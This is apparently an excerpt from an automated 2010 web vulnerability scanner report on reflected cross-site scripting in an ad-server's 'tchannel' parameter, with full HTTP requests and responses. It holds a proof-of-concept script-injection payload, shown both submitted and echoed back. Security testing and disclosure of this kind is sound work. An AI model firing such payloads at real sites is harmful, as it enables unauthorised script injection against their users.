Set-Cookie: ciconv0=-3083478425612183657-d03a2771-fccf-4321-88d7-3a0c77ffec63#6186497; Domain=.admailtiser.com; Expires=Wed, 27-Oct-2010 02:07:00 GMT; Path=/
Set-Cookie: JSESSIONID=2C34C7E72D4CFC4688DED13F3B5A8AE4; Path=/
Connection: keep-alive
Content-Length: 24841


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<html>
   <head>
    <META H
...[SNIP]...
earchoverthenet.com/st?ttype=1&cipid=7780291&fac=1&pixels=3&logo=3&cicat=28&cirel=0.4736054741176855&ciconf=1&cidomid=-1786316931187180868&cihid=7&kw=BT7&hl=23&ktc=0362&sid=11223&auth=NTTO&subid=310305ada82"><script>alert(1)</script>48bc0c64bc2&cisid=d03a2771-fccf-4321-88d7-3a0c77ffec63&imgpid=6265&crid=6186497&cict=http%3A%2F%2Fad%2Emedia%2Dservers%2Enet%2Fclk%3F2%2C13%253B8477a2e58c7b5b9a%253B12be639a2c0%2C0%253B%253B%253B3662490593%2CAAAA
...[SNIP]...

1.7. http://oridtags2.admailtiser.com/st [tchannel parameter]  previous

Summary

Severity:   High
Confidence:   Certain
Host:   http://oridtags2.admailtiser.com
Path:   /st

Issue detail

The value of the tchannel request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fd86a"><script>alert(1)</script>3e1268a9356 was submitted in the tchannel parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /st?cipid=7780291&width=728&height=90&tchannel=fd86a"><script>alert(1)</script>3e1268a9356&auth=NTTO&bgcolor=33ff00&fgcolor=e60066&cilp=&subid=310305&clickurl=http%3A%2F%2Fad%2Emedia%2Dservers%2Enet%2Fclk%3F2%2C13%253B8477a2e58c7b5b9a%253B12be639a2c0%2C0%253B%253B%253B3662490593%2CAAAAAEY5EwABZl4AAAAAAK2WGAAAAAAAAgAAAAYAAAAAAP8AAAACFVpDHwAAAAAAmOwSAAAAAAB%2DxyAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAD46AsAAAAAAAIAAwAAAAAAwKI55isBAAAAAAAAADNlNDYxYTkyLWUwYTMtMTFkZi05NzBmLTAwMzA0OGQ1NjNiMAAAAAAAAAA%3D%2C%2Chttp%253A%252F%252Fwww%2Edjhungama%2Ecom%252Findex%2Ephp%253Fshowtopic%253D41667%2C&cict_unencoded=0&crid=6186497&vurlid=0&blid=2148222&secid=1259846&sitid=&catid=0&srcurl=http%3A%2F%2Fwww%2Edjhungama%2Ecom%2Findex%2Ephp%3Fshowtopic%3D41667&qs= HTTP/1.1
Host: oridtags2.admailtiser.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?AAAAAEY5EwABZl4AAAAAAK2WGAAAAAAAAgAAAAYAAAAAAP8AAAACFVpDHwAAAAAAmOwSAAAAAAB-xyAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAD46AsAAAAAAAIAAwAAAAAAAAAAAAAAAAAAAAB8ngCiPwAAAAAAAAAAAAAAfJ4Asj8AAAAAAAAAAAAAABvGgLY.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACC4QOnHRgPCeUakdKV1RzEFDkOjnnzs1uXPh7VAAAAAA==,,http%3A%2F%2Fwww.djhungama.com%2Findex.php%3Fshowtopic%3D41667,Z%3D728x90%26s%3D1259846%26_salt%3D2775652930%26B%3D10%26u%3Dhttp%253A%252F%252Fwww.djhungama.com%252Findex.php%253Fshowtopic%253D41667%26r%3D0,3e461a92-e0a3-11df-970f-003048d563b0
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate
Content-Type: text/html;charset=UTF-8
Date: Tue, 26 Oct 2010 01:57:59 GMT
Expires: Sat, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://admailtiser.com/w3c/p3p.xml", CP="NOI DSP COR CURa OUR NOR UNI"
P3P: policyref="http://admailtiser.com/w3c/p3p.xml", CP="NOI DSP COR CURa OUR NOR UNI"
Pragma: no-cache
Server: Apache
Set-Cookie: cicouid=22442ae3-021a-4517-b0e6-0a06eb69aa556q0Cf3X_Ur2Elluh-qDznw; Domain=.admailtiser.com; Expires=Wed, 26-Oct-2011 01:58:00 GMT; Path=/
Set-Cookie: ciconv0=5952513792446671475-76d23646-d131-4da5-906a-4ac97629a8f8#6186497; Domain=.admailtiser.com; Expires=Wed, 27-Oct-2010 01:58:00 GMT; Path=/
Set-Cookie: JSESSIONID=CEDBF0634AA450DD5891B14A0D43743D; Path=/
Connection: keep-alive
Content-Length: 27560


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<html>
   <head>
    <META H
...[SNIP]...
this, 'http://results.searchoverthenet.com/st?ttype=1&cipid=7780291&fac=1&pixels=3&logo=3&cicat=28&cirel=0.4736054741176855&ciconf=1&cidomid=-1786316931187180868&cihid=7&kw=Send+sms&hl=23&ktc=0347&sid=fd86a"><script>alert(1)</script>3e1268a9356&auth=NTTO&subid=310305&cisid=76d23646-d131-4da5-906a-4ac97629a8f8&imgpid=6265&crid=6186497&cict=http%3A%2F%2Fad%2Emedia%2Dservers%2Enet%2Fclk%3F2%2C13%253B8477a2e58c7b5b9a%253B12be639a2c0%2C0%253B%253
...[SNIP]...

Report generated at Tue Oct 26 15:32:33 CDT 2010.